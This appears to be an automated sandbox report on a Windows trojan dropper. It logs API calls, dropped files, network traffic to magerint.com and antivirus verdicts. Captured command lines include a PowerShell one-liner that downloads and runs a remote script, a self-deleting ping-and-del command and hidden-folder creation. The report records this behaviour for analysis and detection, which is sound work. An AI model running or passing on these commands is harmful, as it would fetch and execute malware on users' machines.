 buffer: Press any key to continue . . .
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002979c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b0e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b0e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b0e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b460
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b460
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b700
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b700
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b700
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22b150
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22ae40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bc40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bc40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000297d40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000297d40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000297d40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000297d40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2553c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2553c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bcb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bcb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bcb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b22bcb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000008d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3641000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3cdb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000620000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3642000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3644000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3644000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3644000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3644000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93eaa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93f5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93f86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93f60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93ebc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93fd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93eab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93ecb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93efc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93ecd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93ea2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93eba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2a81000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cfe000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cfe000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cff000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cff000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cff000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cff000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cff000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2cff000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\i6.bat
file C:\Users\test22\AppData\Roaming\postmon.exe
file C:\Users\test22\AppData\Roaming\Popup.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /c mode con:cols=0080 lines=0025
cmdline C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://magerint.com/js/debug2.ps1')"
cmdline C:\Windows\system32\cmd.exe /c pause
cmdline C:\Windows\system32\cmd.exe /c attrib +h C:\Users\test22\AppData\Local\Temp\wtmpd
cmdline C:\Windows\system32\cmd.exe /c echo:0>C:\Users\test22\AppData\Local\Temp\i6.t
cmdline C:\Windows\system32\cmd.exe /c C:\Users\test22\AppData\Local\Temp\i6.bat
cmdline powershell -command IEX(New-Object Net.Webclient).DownloadString('https://magerint.com/js/debug2.ps1')
cmdline "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://magerint.com/js/debug2.ps1')"
cmdline C:\Windows\system32\cmd.exe /c title System32
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Roaming\postmon.exe" >> NUL
cmdline C:\Windows\system32\cmd.exe /c if not exist "C:\Users\test22\AppData\Local\Temp\myfiles" mkdir "C:\Users\test22\AppData\Local\Temp\myfiles"
cmdline C:\Windows\system32\cmd.exe /c
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Roaming\postmon.exe" >> NUL
cmdline C:\Windows\system32\cmd.exe /c if not exist "C:\Users\test22\AppData\Local\Temp\wtmpd" mkdir "C:\Users\test22\AppData\Local\Temp\wtmpd"
file C:\Users\test22\AppData\Roaming\postmon.exe
file C:\Users\test22\AppData\Roaming\Popup.exe
file C:\Users\test22\AppData\Roaming\postmon.exe
file C:\Users\test22\AppData\Roaming\Popup.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\sysnative\cmd.exe
parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://magerint.com/js/debug2.ps1')"
filepath: C:\Windows\sysnative\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Roaming\postmon.exe" >> NUL
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x0005e600', u'virtual_address': u'0x00002000', u'entropy': 7.9816114147673, u'name': u'.text', u'virtual_size': u'0x0005e414'} entropy 7.98161141477 description A section with a high entropy has been found
entropy 0.994729907773 description Overall entropy of this PE file is high
Data received 
Data received F<html><head><title>400 Bad Request</title></head><body> <h2>HTTPS is required</h2> <p>This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.<br /> <blockquote>Hint: The URL should starts with <b>https</b>://</blockquote> </p> <hr /> Powered By LiteSpeed Web Server<br /> <a href='http://www.litespeedtech.com'><i>http://www.litespeedtech.com</i></a> </body></html>
Data sent okd;©@VSéû í]Ô^u‡;é›.Nö¤ÚHø/5 ÀÀÀ À 28*ÿ magerint.com  
Data sent okd;µÕ4ÌHNV¹z5ðIKó]U*š³þ…“=´W/5 ÀÀÀ À 28*ÿ magerint.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline C:\Windows\system32\cmd.exe /c attrib +h C:\Users\test22\AppData\Local\Temp\wtmpd
cmdline attrib +h C:\Users\test22\AppData\Local\Temp\wtmpd
cmdline ping 127.0.0.1
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Roaming\postmon.exe" >> NUL
cmdline C:\Windows\system32\cmd.exe /c if not exist "C:\Users\test22\AppData\Local\Temp\myfiles" mkdir "C:\Users\test22\AppData\Local\Temp\myfiles"
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Roaming\postmon.exe" >> NUL
cmdline C:\Windows\system32\cmd.exe /c if not exist "C:\Users\test22\AppData\Local\Temp\wtmpd" mkdir "C:\Users\test22\AppData\Local\Temp\wtmpd"
host 62.217.160.2
host 77.88.55.88
file C:\Users\test22\AppData\Local\Temp\echo:1
file C:\Users\test22\AppData\Local\Temp\echo:0
Time & API Arguments Status Return Repeated

send

 buffer: okd;©@VSéû í]Ô^u‡;é›.Nö¤ÚHø/5 ÀÀÀ À 28*ÿ magerint.com  
socket: 1256
sent: 116
1 116 0

send

 buffer: okd;µÕ4ÌHNV¹z5ðIKó]U*š³þ…“=´W/5 ÀÀÀ À 28*ÿ magerint.com  
socket: 1256
sent: 116
1 116 0
DrWeb Trojan.MulDrop20.4429
MicroWorld-eScan IL:Trojan.MSILZilla.25637
ALYac IL:Trojan.MSILZilla.25637
Malwarebytes Trojan.Dropper.MSIL
VIPRE IL:Trojan.MSILZilla.25637
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Arcabit IL:Trojan.MSILZilla.D6425
BitDefenderTheta Gen:NN.ZemsilF.36270.xm0@aKjV@Yb
Cyren W32/MSIL_Agent.ERT.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDropper.Agent.FPO
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Dropper.MSIL.Dapato.gen
BitDefender IL:Trojan.MSILZilla.25637
Avast Win32:PWSX-gen [Trj]
Emsisoft IL:Trojan.MSILZilla.25637 (B)
F-Secure Trojan.TR/Dropper.Gen
McAfee-GW-Edition BehavesLike.Win32.Generic.fc
Trapmine malicious.high.ml.score
FireEye Generic.mg.d699bb26d34ae6d5
Sophos ML/PE-A
Ikarus Trojan.MSIL.Crypt
Avira TR/Dropper.Gen
Microsoft Trojan:MSIL/AsyncRat.ABJU!MTB
